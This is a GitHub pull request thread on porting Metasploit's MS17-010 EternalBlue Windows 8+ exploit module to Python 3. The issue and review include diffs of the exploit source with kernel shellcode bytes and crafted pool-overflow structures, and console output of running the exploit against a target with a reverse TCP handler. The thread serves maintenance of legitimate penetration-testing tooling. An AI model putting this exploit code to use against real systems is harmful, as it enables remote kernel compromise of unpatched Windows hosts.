### PR TITLE
Converts the external ms17_010_eternalblue_win8 to run only with Python3

### LINKED ISSUE #13478: ms17_010_eternalblue_win8 does not work with Python 3.
_Originally posted by @kal1s in https://github.com/rapid7/metasploit-framework/issues/13458#issuecomment-629835823_

Hi guys!

   I'm having the same problem with the **ms17_010_eternalblue_win8** exploit were in my Kali Linux is using **Python3** on the **shebangs** but the **exploit doesn't work**.

   I needed to break some things here to understand what happening and I think I have some advances.

   Only changing the **shebangs is not sufficient** because a lot of **syntaxes and programming language was changed from Python2 to Python3**.

   It needs to do some **porting** from **Python2 to Python3**, see: https://docs.python.org/3/howto/pyporting.html

   **I solve some problems but my lack of knowledge of the exploit is a blocked road to me continue to solve this problem.**

   I think all **other exploits in Python2** that are **going to Python3 will suffer the same problem** that we **are describing here**.

   In resume was **needed to change a lot of string and byte concatenation where in Python3 is mandatory to cast the type to the type that is receiving the value**, see: https://stackoverflow.com/questions/606191/convert-bytes-to-a-string.

   So let me show to you guys what I did to have a **_palliative and incomplete solution_**.

### My Versions

- **Kali Linux 2020.2 Fresh Install (Yesterday with all Updates)**

```
# cat /etc/os-release 

PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2020.2"
VERSION_ID="2020.2"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
```

- **Metasploit from Kali Linux Repository**

```
msf5 > version

Framework: 5.0.89-dev
Console  : 5.0.89-dev
```

- **Python2**

```
$ python --version

Python 2.7.18
```

- **Python3**

```
$ python3 --version

Python 3.8.3rc1
```

### Steps to Reproduce the Python2 Version

- Using shebangs **#!/usr/bin/env python**:

```
msf5 > use windows/smb/ms17_010_eternalblue_win8

[-] Failed to load module: exploit/windows/smb/ms17_010_eternalblue_win8

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+


[*] Using exploit/windows/smb/ms17_010_eternalblue_win8

```

- Log Information on **/root/.msf4/logs/framework.log**:
```
[05/17/2020 15:10:33] [e(0)] core: /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb failed to load due to the following error: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb Call stack: /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `initialize' /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `open' /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `read_module_content' /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:127:in `load_module' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:91:in `block in load_cached_module' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in `each' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in `load_cached_module' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:45:in `create' /usr/share/metasploit-framework/lib/msf/core/module_manager.rb:99:in `block in create' /usr/share/metasploit-framework/lib/msf/core/module_manager.rb:94:in `each' /usr/share/metasploit-framework/lib/msf/core/module_manager.rb:94:in `create' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:697:in `cmd_use' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start' /usr/bin/msfconsole:23:in `<main>'
[05/17/2020 15:10:33] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py:
Traceback (most recent call last):
  File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 15, in <module>
    from metasploit import module
  File "/usr/share/metasploit-framework/lib/msf/core/modules/external/python/metasploit/module.py", line 6, in <module>
    from metasploit import cli
  File "/usr/share/metasploit-framework/lib/msf/core/modules/external/python/metasploit/cli.py", line 10
    print(*args, file=sys.stderr, **kwargs)
          ^
SyntaxError: invalid syntax

[05/17/2020 15:10:33] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py, unknown module type
[05/17/2020 15:10:33] [e(0)] core: /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb failed to load due to the following error: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb Call stack: /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `initialize' /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `open' /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `read_module_content' /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:127:in `load_module' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:91:in `block in load_cached_module' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in `each' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in `load_cached_module' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:45:in `create' /usr/share/metasploit-framework/lib/msf/core/module_manager.rb:90:in `create' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:697:in `cmd_use' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:450:in `cmd_search' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:701:in `cmd_use' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start' /usr/bin/msfconsole:23:in `<main>'
[05/17/2020 15:10:33] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py:
Traceback (most recent call last):
  File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 15, in <module>
    from metasploit import module
  File "/usr/share/metasploit-framework/lib/msf/core/modules/external/python/metasploit/module.py", line 6, in <module>
    from metasploit import cli
  File "/usr/share/metasploit-framework/lib/msf/core/modules/external/python/metasploit/cli.py", line 10
    print(*args, file=sys.stderr, **kwargs)
          ^
SyntaxError: invalid syntax

[05/17/2020 15:10:33] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py, unknown module type

```

### Steps to Reproduce the Python3 Version

- Using shebangs **#!/usr/bin/env python3**:

```
msf5 > info exploit/windows/smb/ms17_010_eternalblue_win8

[-] Invalid module: exploit/windows/smb/ms17_010_eternalblue_win8

```

- Log Information on **/root/.msf4/logs/framework.log**:

```
[05/17/2020 13:14:40] [e(0)] core: /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb failed to load due to the following error: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb Call stack: /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `initialize' /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `open' /usr/share/metasploit-framework/lib/msf/core/modules/loader/directory.rb:77:in `read_module_content' /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:127:in `load_module' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:91:in `block in load_cached_module' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in `each' /usr/share/metasploit-framework/lib/msf/core/module_manager/cache.rb:86:in `load_cached_module' /usr/share/metasploit-framework/lib/msf/core/module_set.rb:45:in `create' /usr/share/metasploit-framework/lib/msf/core/module_manager.rb:90:in `create' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:162:in `block in cmd_info' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:161:in `each' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/modules.rb:161:in `cmd_info' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start' /usr/bin/msfconsole:23:in `<main>'
[05/17/2020 13:14:40] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py:
Traceback (most recent call last):
  File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in <module>
    ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x260  # with these fea, ntfea size is 0x1c80
TypeError: can't concat str to bytes

[05/17/2020 13:14:40] [e(0)] core: Unable to load module /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py, unknown module type

```

### Some Fix on Python3 Version that Allow me to Move On

- I followed each error described on **framework.log** to make each change on **ms17_010_eternalblue_win8.py**.
- The **Python3 Script with these changes is at the end of this Post**.
```
$ diff ms17_010_eternalblue_win8.py ms17_010_eternalblue_win8.py.kal1s

142,143c142,143
<     '\x03\x83\xc7\x08\x48\x8d\x34\x19\xe8\xf4\x00\x00\x00\x3d' + proc_hash +
<     '\x74\x10\x3d' + proc_hash + '\x74\x09\x48\x8b\x0c' 
---
>     '\x03\x83\xc7\x08\x48\x8d\x34\x19\xe8\xf4\x00\x00\x00\x3d' + str(proc_hash) +
>     '\x74\x10\x3d' + str(proc_hash) + '\x74\x09\x48\x8b\x0c'
178,180c178,180
< ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x260  # with these fea, ntfea size is 0x1c80
< ntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\x00'*0x735d  # 0x8fe8 - 0x1c80 - 0xc = 0x735c
< ntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\x00'*0x8148  # overflow to SRVNET_BUFFER_HDR
---
> ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00'.encode())*0x260  # with these fea, ntfea size is 0x1c80
> ntfea9000 += pack('<BBH', 0, 0, 0x735c) + '\x00'.encode()*0x735d  # 0x8fe8 - 0x1c80 - 0xc = 0x735c
> ntfea9000 += pack('<BBH', 0, 0, 0x8147) + '\x00'.encode()*0x8148  # overflow to SRVNET_BUFFER_HDR
272c272
< fakeSrvNetBufferX64Nx += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)
---
> fakeSrvNetBufferX64Nx += str(pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR))
275,277c275,277
< fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)
< fakeSrvNetBufferX64Nx += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR)  # _, _, pointer to fake struct
< fakeSrvNetBufferX64Nx += pack('<QQ', 0, 0)
---
> fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, 0))
> fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, TARGET_HAL_HEAP_ADDR))  # _, _, pointer to fake struct
> fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, 0))
280,281c280,281
< fakeSrvNetBufferX64Nx += pack('<QHHI', 0, 0x60, 0x1004, 0)  # MDL.Next, MDL.Size, MDL.MdlFlags
< fakeSrvNetBufferX64Nx += pack('<QQ', 0, PTE_ADDR+7-0x7f)  # MDL.Process, MDL.MappedSystemVa
---
> fakeSrvNetBufferX64Nx += str(pack('<QHHI', 0, 0x60, 0x1004, 0))  # MDL.Next, MDL.Size, MDL.MdlFlags
> fakeSrvNetBufferX64Nx += str(pack('<QQ', 0, PTE_ADDR+7-0x7f))  # MDL.Process, MDL.MappedSystemVa
285c285
< feaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx # -1 because first '\x00' is for name
---
> feaListNx += pack('<BBH', 0, 0, len(fakeSrvNetBufferX64Nx)-1) + fakeSrvNetBufferX64Nx.encode() # -1 because first '\x00' is for name
294,295c294,295
<     fakeSrvNetBufferX64 += pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR)  # flag, _, _, pNetRawBuffer
<     fakeSrvNetBufferX64 += pack('<QII', 0, 0x82e8, 0)  # _, thisNonPagedPoolSize, _
---
>     fakeSrvNetBufferX64 += str(pack('<HHIQ', 0xfff0, 0, 0, TARGET_HAL_HEAP_ADDR))  # flag, _, _, pNetRawBuffer
>     fakeSrvNetBufferX64 += str(pack('<QII', 0, 0x82e8, 0))  # _, thisNonPagedPoolSize, _
297,299c297,299
<     fakeSrvNetBufferX64 += pack('<QQ', 0, totalRecvSize)  # offset 0x40
<     fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR)  # pmdl2, pointer to fake struct
<     fakeSrvNetBufferX64 += pack('<QQ', 0, 0)
---
>     fakeSrvNetBufferX64 += str(pack('<QQ', 0, totalRecvSize))  # offset 0x40
>     fakeSrvNetBufferX64 += str(pack('<QQ', TARGET_HAL_HEAP_ADDR, TARGET_HAL_HEAP_ADDR))  # pmdl2, pointer to fake struct
>     fakeSrvNetBufferX64 += str(pack('<QQ', 0, 0))
302,303c302,303
<     fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0)  # MDL.Next, MDL.Size, MDL.MdlFlags
<     fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80)  # MDL.Process, MDL.MappedSystemVa
---
>     fakeSrvNetBufferX64 += str(pack('<QHHI', 0, 0x60, 0x1004, 0))  # MDL.Next, MDL.Size, MDL.MdlFlags
>     fakeSrvNetBufferX64 += str(pack('<QQ', 0, TARGET_HAL_HEAP_ADDR-0x80))  # MDL.Process, MDL.MappedSystemVa
310c310
<     feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf # -1 because first '\x00' is for name
---
>     feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuf)-1) + fakeSrvNetBuf.encode() # -1 because first '\x00' is for name
328,329c328,329
< fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58)  # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)
< fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0)  # offset 0x60
---
> fake_recv_struct += str(pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x58))  # offset 0x50: KSPIN_LOCK, (LIST_ENTRY to itself)
> fake_recv_struct += str(pack('<QQ', TARGET_HAL_HEAP_ADDR+0x58, 0))  # offset 0x60
331,333c331,333
< fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0)  # offset 0x110: fn_ptr array
< fake_recv_struct += pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0)  # set arg1 to -0x8150
< fake_recv_struct += pack('<QII', 0, 0, 3)  # offset 0x130
---
> fake_recv_struct += str(pack('<QQ', TARGET_HAL_HEAP_ADDR+0x170, 0))  # offset 0x110: fn_ptr array
> fake_recv_struct += str(pack('<QQ', (0x8150^0xffffffffffffffff)+1, 0))  # set arg1 to -0x8150
> fake_recv_struct += str(pack('<QII', 0, 0, 3))  # offset 0x130
335c335
< fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180)  # shellcode address
---
> fake_recv_struct += str(pack('<QQ', 0, TARGET_HAL_HEAP_ADDR+0x180))  # shellcode address
682c682
<     sc = eternalblue_kshellcode_x64(args['ProcessName']) + b64decode(args['payload_encoded'])
---
>     sc = eternalblue_kshellcode_x64(args['ProcessName']) + str(b64decode(args['payload_encoded']))

```
- Now I can see the information about the exploit with no errors on **framework.log**:
```
msf5 > info exploit/windows/smb/ms17_010_eternalblue_win8

       Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
     Module: exploit/windows/smb/ms17_010_eternalblue_win8
   Platform: Windows
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Average
  Disclosed: 2017-03-14

Provided by:
  Equation Group
  Shadow Brokers
  sleepya
  wvu <wvu@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   win x64

Check supported:
  No

Basic options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  GroomAllocations  13               yes       Initial number of times to groom the kernel pool.
  ProcessName       spoolsv.exe      no        Process to inject payload into.
  RHOST                              yes       Target server
  RPORT             445              yes       Target server port
  SMBPass                            no        (Optional) The password for the specified username
  SMBUser                            no        (Optional) The username to authenticate as

Payload information:

Description:
  EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya 
  The exploit might FAIL and CRASH a target system (depended on what 
  is overwritten) The exploit support only x64 target Tested on: - 
  Windows 2012 R2 x64 - Windows 8.1 x64 - Windows 10 Pro Build 10240 
  x64 - Windows 10 Enterprise Evaluation Build 10586 x64 Default 
  Windows 8 and later installation without additional service info: - 
  anonymous is not allowed to access any share (including IPC$) - More 
  info: 
https://support.microsoft.c  om/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows 
  - tcp port 445 is filtered by firewall Reference: - 
  http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ - 
  "Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre" 
  https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit 
  Exploit info: - If you do not know how exploit for Windows 7/2008 
  work. Please read my exploit for Windows 7/2008 at 
  https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a 
  because the trick for exploit is almost the same - The exploit use 
  heap of HAL for placing fake struct (address 0xffffffffffd00e00) and 
  shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 
  2012, the NX bit is set on this memory page. Need to disable it 
  before controlling RIP. - The exploit is likely to crash a target 
  when it failed - The overflow is happened on nonpaged pool so we 
  need to massage target nonpaged pool. - If exploit failed but target 
  does not crash, try increasing 'GroomAllocations' value (at least 5) 
  - See the code and comment for exploit detail. Disable NX method: - 
  The idea is from "Bypassing Windows 10 kernel ASLR (remote) by 
  Stefan Le Berre" (see link in reference) - The exploit is also the 
  same but we need to trigger bug twice - First trigger, set 
  MDL.MappedSystemVa to target pte address - Write '\x00' to disable 
  the NX flag - Second trigger, do the same as Windows 7 exploit - 
  From my test, if exploit disable NX successfully, I always get code 
  execution

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://cvedetails.com/cve/CVE-2017-0143/
  https://cvedetails.com/cve/CVE-2017-0144/
  https://cvedetails.com/cve/CVE-2017-0145/
  https://cvedetails.com/cve/CVE-2017-0146/
  https://cvedetails.com/cve/CVE-2017-0147/
  https://cvedetails.com/cve/CVE-2017-0148/
  https://www.exploit-db.com/exploits/42030
  https://github.com/worawit/MS17-010

Also known as:
  ETERNALBLUE
```

- And now I can use the exploit:

`msf5 > use exploit/windows/smb/ms17_010_eternalblue_win8`

- Setting the target:
```
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > set rhost 172.16.1.60

rhost => 172.16.1.60
```
- Looking the options:
```
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > options

Module options (exploit/windows/smb/ms17_010_eternalblue_win8):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   GroomAllocations  13               yes       Initial number of times to groom the kernel pool.
   ProcessName       spoolsv.exe      no        Process to inject payload into.
   RHOST             172.16.1.60      yes       Target server
   RPORT             445              yes       Target server port
   SMBPass                            no        (Optional) The password for the specified username
   SMBUser                            no        (Optional) The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   win x64

```
- Executing the exploit:
```
msf5 exploit(windows/smb/ms17_010_eternalblue_win8) > run

[*] Started reverse TCP handler on 172.20.1.119:4444 
[*] shellcode size: 1960
[*] numGroomConn: 13
[-] Missing required parameter 'digestmod'.
[-] Exploit aborted due to failure: unknown: Module exited abnormally
[*] Exploit completed, but no session was created.

```
- No errors and warnings on **framework.log** and looking that the exploit is reaching the target:
```
# tcpdump -i tun0 -n host 172.16.1.60

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
13:36:42.046252 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [S], seq 568799431, win 64240, options [mss 1460,sackOK,TS val 296807334 ecr 0,nop,wscale 7], length 0
13:36:42.294913 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [S.], seq 3814031721, ack 568799432, win 8192, options [mss 1358,nop,wscale 8,sackOK,TS val 40782235 ecr 296807334], length 0
13:36:42.294998 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [.], ack 1, win 502, options [nop,nop,TS val 296807583 ecr 40782235], length 0
13:36:42.296648 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [P.], seq 1:52, ack 1, win 502, options [nop,nop,TS val 296807585 ecr 40782235], length 51
13:36:42.602182 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [.], ack 52, win 257, options [nop,nop,TS val 40782261 ecr 296807585], length 0
13:36:42.602259 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [P.], seq 1:210, ack 52, win 257, options [nop,nop,TS val 40782261 ecr 296807585], length 209
13:36:42.602284 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [.], ack 210, win 501, options [nop,nop,TS val 296807890 ecr 40782261], length 0
13:36:42.610347 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [P.], seq 52:192, ack 210, win 501, options [nop,nop,TS val 296807898 ecr 40782261], length 140
13:36:42.909451 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [P.], seq 210:605, ack 192, win 257, options [nop,nop,TS val 40782291 ecr 296807898], length 395
13:36:42.909510 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [.], ack 605, win 501, options [nop,nop,TS val 296808198 ecr 40782291], length 0
13:36:42.919345 IP 172.20.1.119.51008 > 172.16.1.60.445: Flags [F.], seq 192, ack 605, win 501, options [nop,nop,TS val 296808208 ecr 40782291], length 0
13:36:43.216441 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [.], ack 193, win 257, options [nop,nop,TS val 40782322 ecr 296808208], length 0
13:36:43.216568 IP 172.16.1.60.445 > 172.20.1.119.51008: Flags [R.], seq 605, ack 193, win 0, length 0
```

### Another Error: "Missing required parameter 'digestmod'"

- The **exploit still doesn't work** and now I'm having this **error when I'm trying to exploit a Windows with this vulnerability**.

- I think it is some **module** that **changed** the **behavior** **from Python2 to Python3**, like something that **was optional in Python2 now is mandatory to specify in Python3**.

- This error only **showing** on **msfconsole** and **not in framework.log**.

- **I don't know so deep this exploit to solve that error but I'll continue trying to.**

**_I did my best and I hope I've helped in some way!_**

@kal1s

[ms17_010_eternalblue_win8.py.kal1s.zip](https://github.com/rapid7/metasploit-framework/files/4640709/ms17_010_eternalblue_win8.py.kal1s.zip)

_Originally posted by @kal1s in https://github.com/rapid7/metasploit-framework/issues/13458#issuecomment-629835823_

### PR DESCRIPTION
**Pull request by agalway-r7**
Closes https://github.com/rapid7/metasploit-framework/issues/13478

This PR changes the `ms17_010_eternalblue_win8.py` external module to run only with python3, and makes the necessary changes to the strings in the exploit to ensure shellcode is generated successfully. One of the main differences between Python2 & Python3 is that in python2, strings are stored as bytes, where as in python3, they are stored as unicode strings:
image

This means that any shellcode that needs to be stored as bytes before being sent to the victim machine has to be explicitly set as a byte string with `b'<shellcode>'`. 

## Verification

- [ ] Start `msfconsole`
- [ ] `use windows/smb/ms17_010_eternalblue_win8`
- [ ] `run`
- [ ] **Verify** the module can successfully create a `meterpreter` session
- [ ] **Verify** the module can successfully execute another payload (IE `payload/cmd/windows/generic`) 

Big thanks to @kal1s for his detailed post on the issue.

### CODE REVIEW

File: modules/exploits/windows/smb/ms17_010_eternalblue_win8.py [hunk 1]
```diff
@@ -117,67 +117,68 @@ def ror( dword, bits ):
...
-    '\xff\xff\xff\x48\x83\xc4\x30\x85\xc0\x75\x45\x48\x8b\x3e\x48'
-    '\x8d\x35\x4d\x00\x00\x00\xb9\x00\x06\x00\x00\xf3\xa4\x48\x8b'
-    '\x45\xf0\x48\x8b\x40\x18\x48\x8b\x40\x20\x48\x8b\x00\x66\x83'
-    '\x78\x48\x18\x75\xf6\x48\x8b\x50\x50\x81\x7a\x0c\x33\x00\x32'
-    '\x00\x75\xe9\x4c\x8b\x78\x20\xbf\x5e\x51\x5e\x83\xe8\x22\xff'
-    '\xff\xff\x48\x89\x03\x31\xc9\x88\x4d\xf8\xb1\x01\x44\x0f\x22'
-    '\xc1\x41\x5f\x5e\x5f\x5b\x5d\xc3\x48\x92\x31\xc9\x51\x51\x49'
-    '\x89\xc9\x4c\x8d\x05\x0d\x00\x00\x00\x89\xca\x48\x83\xec\x20'
-    '\xff\xd0\x48\x83\xc4\x30\xc3'
+    b'\x55\xe8\x2e\x00\x00\x00\xb9\x82\x00\x00\xc0\x0f\x32\x4c\x8d'+
```
Comment (agalway-r7) [inline modules/exploits/windows/smb/ms17_010_eternalblue_win8.py:122]: You could get rid of the `+` symbols in this code and clean it up, like so:
```suggestion
    b'\x55\xe8\x2e\x00\x00\x00\xb9\x82\x00\x00\xc0\x0f\x32\x4c\x8d'
```
But it doesn't seem to work as well  ¯\_(ツ)_/¯

**Comment by adfoster-r7** [comment]
> Closes #13458

Just to confirm, does this PR fix that issue? 👀

**Comment by agalway-r7** [comment]
> > Closes #13458
> 
> Just to confirm, does this PR fix that issue? 👀

Nope. Fixed the `Closes` reference in the description

**Comment by adfoster-r7** [comment]
This looks good to me, we'll have to confirm what the experience is for a python 2.x user, and if we want to use `#!/usr/bin/env python3` or not

**Comment by agalway-r7** [comment]
> This looks good to me, we'll have to confirm what the experience is for a python 2.x user, and if we want to use `#!/usr/bin/env python3` or not
IIRC the script won't work for python2.x

**Comment by cgranleese-r7** [comment]
Seem to be getting an issue when successfully getting a meterpreter session, then `exit` the session and try to run again straight away. It returns this stack trace:

image

This isn't super consistent, has happened maybe three times during testing.

**Comment by adfoster-r7** [comment]
@cgranleese-r7 What's the result of running `ulimit -a` on your machine? 👀

**Comment by cgranleese-r7** [comment]
@adfoster-r7 

image

**Comment by adfoster-r7** [comment]
I wonder if the you're running out of file descriptors as the external modules are spun up in their own process, which in this case will include loading the python runtime and all of the associated dependencies 🤔 

There's probably easier ways than this, but this might help get you started on confirming what's happening:

```
msf6 exploit(solaris/ssh/pam_username_bof) > irb
[*] Starting IRB shell...
[*] You are in exploit/solaris/ssh/pam_username_bof

>> $PID
=> 41666
>> `lsof -p 41666`; nil
"COMMAND   PID     USER   FD    TYPE             DEVICE  SIZE/OFF                NODE NAME\n" +
"ruby    41666 adfoster  cwd     DIR                1,4      2176              958267 /Users/adfoster/Documents/code/metasploit-framework\n" +
"ruby    41666 adfoster  txt     REG                1,4     13184            30801815 /Users/adfoster/.rvm/rubies/ruby-2.7.2/bin/ruby\n" +
... etc ...
=> nil
>> `lsof -p 41666`.lines.length - 1
=> 75
>> 
```

**Comment by cgranleese-r7** [comment]
This was also an error found during testing, I believe this only occurred once. @agalway-r7 and I found this when testing together but adding it here for visibility.

image

**Comment by agalway-r7** [comment]
> This error was found during testing, I believe this only occurred once. @agalway-r7 and I found this when when running through some testing on a call but adding it here for visibility.
> 
> image

Fixed with latest commit, there was a stray `byte + string` concatenation I missed

**Comment by cgranleese-r7** [comment]
Gave this another test. Didn't encounter any of the previous errors.

**Comment by cgranleese-r7** [comment]
## Release Notes
This PR changes the ms17_010_eternalblue_win8.py external module to run only with python3, and makes the necessary changes to the strings in the exploit to ensure shellcode is generated successfully. One of the main differences between Python2 & Python3 is that in python2, strings are stored as bytes, where as in python3, they are stored as unicode strings.

**Pull request merged**